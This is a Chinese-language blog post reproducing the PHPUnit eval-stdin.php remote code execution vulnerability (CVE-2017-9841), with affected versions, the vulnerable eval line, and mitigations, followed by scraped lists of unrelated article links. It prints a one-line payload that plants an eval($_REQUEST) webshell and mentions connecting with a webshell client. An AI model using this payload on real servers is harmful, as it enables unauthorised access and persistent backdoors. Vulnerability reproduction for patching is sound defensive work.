phpunit 远程代码执行漏洞(CVE-2017-9841)复现

  • 上海虹桥机场有这么一个故事,一对恋人在机场分手,女对男说“你别等我了,我们不会有结果,就像机场永远等不来火车,我们以后也不会有交集”。没过几年,虹桥机场跟火车站连在了一起,设计这个工程的总工程师就是那个男的,只要有爱就有办法,任何人都可以无止境的对一个人好,但是前提是值得。

漏洞概述:

  • PHPUnit 是 PHP 程式语言中最常见的单元测试 (unit testing) 框架,通常phpunit使用composer非常流行的PHP依赖管理器进行部署,将会在当前目录创建一个vendor文件夹.phpunit生产环境中仍然安装了它,如果该编写器模块存在于Web可访问目录,则存在远程代码执行漏洞。

漏洞版本:

  • 4.8.19 ~ 4.8.27
  • 5.0.10 ~ 5.6.2

基本原理:

  • 漏洞位于/phpunit/src/Util/PHP/eval-stdin.php。

    eval('?>'.file_get_contents('php://input'));

漏洞复现:

  • 总体来说就是向vendor/phpunit/src/Util/PHP/eval-stdin.php发送POST请求执行php代码。
  • 例如直接执行phpinfo
  • 也可以直接写入一句话木马。<?=file_put_contents("1.php", '<?=eval($_REQUEST[1]);?>');
    成功生成,即可菜刀连接。

漏洞修复:

  • 果断一点,生产环境中直接删掉phpunit,没有用。

  • 如果不想删,念旧情,直接升级吧,

  • 懒打升级?那就直接设置权限,禁止访问该目录。

    余生很长,请多指教。

phpunit 远程代码执行漏洞(CVE-2017-9841)复现相关推荐

  1. php x24 x65 x6d x61,Jboss远程代码执行漏洞CVE:2013-4810获得system权限

    此方法成功的渗透至Windows系统并获得最高权限exp 此方法成功的渗透至Windows系统并获得最高权限 exp ?php/*Apache Tomcat/JBoss EJBInvokerServl ...

  2. F5 BIG-IP 远程代码执行漏洞 CVE-2021-22986 虚拟机上复现

    一.在vmware上安装BIGIP-15.1.0 进入F5官方主页:https://support.f5.com/csp/home 点击下载按钮(如下图所示) 进入页面后,我们选择v15.X版本 选择 ...

  3. Weblogic远程代码执行漏洞(CVE-2023-21839)复现/保姆级讲解

    目录 引言 产品简介 漏洞描述 影响范围 漏洞复现 环境搭建 JDK安装: Weblogic安装: 漏洞利用 漏OracleOracle 引言 本文内容仅供学习参考,若读者利用本文内容做出违法行为,笔 ...

  4. SMB v1远程代码执行漏洞(CVE-2020-1301)复现

    0x00影响版本 参考:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1301 0x01漏洞分 ...

  5. CVE-2021-1675: Windows Print Spooler远程代码执行漏洞

    ** 赶紧点击上方话题进行订阅吧!** 报告编号:B6-2021-062902 报告来源:360CERT 报告作者:360CERT 更新日期:2021-06-29 1 漏洞简述 2021年06月29日 ...

  6. 【安全风险通告】Spring Framework远程代码执行漏洞(CVE-2022-22965)安全风险通告第二次更新...

    奇安信CERT 致力于第一时间为企业级用户提供安全风险通告和有效解决方案. 安全通告 近日,奇安信CERT监测到Spring Framework存在远程代码执行漏洞(CVE-2022-22965),在 ...

  7. CVE-2018-8174 IE浏览器远程代码执行漏洞

    0x00漏洞简介 在2018年5月9日的时候360发表了一份apt攻击分析及溯源报告 文中提到了cve-2018-8174这个漏洞的首次在apt方面的应用 原文地址:http://www.4hou.c ...

  8. Splunk Enterprise远程代码执行漏洞(CVE-2022-43571)安全风险通告

    奇安信CERT 致力于第一时间为企业级用户提供安全风险通告和有效解决方案. 安全通告 Splunk Enterprise是机器数据的引擎.使用Splunk可收集.索引和利用所有应用程序.服务器和设备生 ...

  9. [系统安全] 十.Windows漏洞利用之SMBv3服务远程代码执行漏洞(CVE-2020-0796)及防御详解

    您可能之前看到过我写的类似文章,为什么还要重复撰写呢?只是想更好地帮助初学者了解病毒逆向分析和系统安全,更加成体系且不破坏之前的系列.因此,我重新开设了这个专栏,准备系统整理和深入学习系统安全.逆向分 ...

最新文章

  1. 网络推广——网络推广专员如何分析网站关键词排名波动影响因素
  2. 动态调整canvas时的问题
  3. Git的基本概念/常用命令及实例
  4. bzoj3550: [ONTAK2010]Vacation1283: 序列
  5. php 流量,PHP 流量控制语句的顶替语法
  6. KMP算法 AC自动机
  7. 智能优化算法应用:基于灰狼算法的二维Otsu图像阈值分割-附代码
  8. 编程珠玑续版-chp2 关联数组-awk
  9. cobar mysql_阿里开源Mysql分布式中间件:Cobar
  10. 邮件中的抄送和密送的区别
  11. 部分女生爱搭配蕾丝的服饰
  12. 于丹《庄子》心得讲稿-《大道与自然》
  13. 10秒钟搞定圆柱齿轮设计所有课题
  14. 笔记本计算机的连接无线网络连接,笔记本电脑连接wifi的方法步骤
  15. linux写makefile用tab报错,隐含规则 - linux makefile教程
  16. 数据库substr……in……
  17. 这 6 个开源项目很 Cool
  18. 【MySQL】测试题02
  19. 图文翻页-兼容IE8和Chrome浏览器
  20. 第七届青年地学论坛女科学家论坛学习

热门文章

  1. day02-HTML的基本标签
  2. hibernate QBC和QBE精讲与案列分析(中)
  3. 信贷系统——增加2种模式访问模式A模式(通过销售人员入户的)B模式(通过Erp入户的)
  4. jquery 设置按钮变成灰色和不可用
  5. 第12期 《顿开金锁走蛟龙》2月刊
  6. 前序遍历的非递归算法
  7. android 调用系统铃声方法
  8. Dynamics 365(CRM) 欢迎加入商务技术交流QQ群(MSCRM商务技术交流群149371424)
  9. centos 磁盘分区
  10. 中国无人零售商店前景展望与未来发展预测分析报告2022-2028年版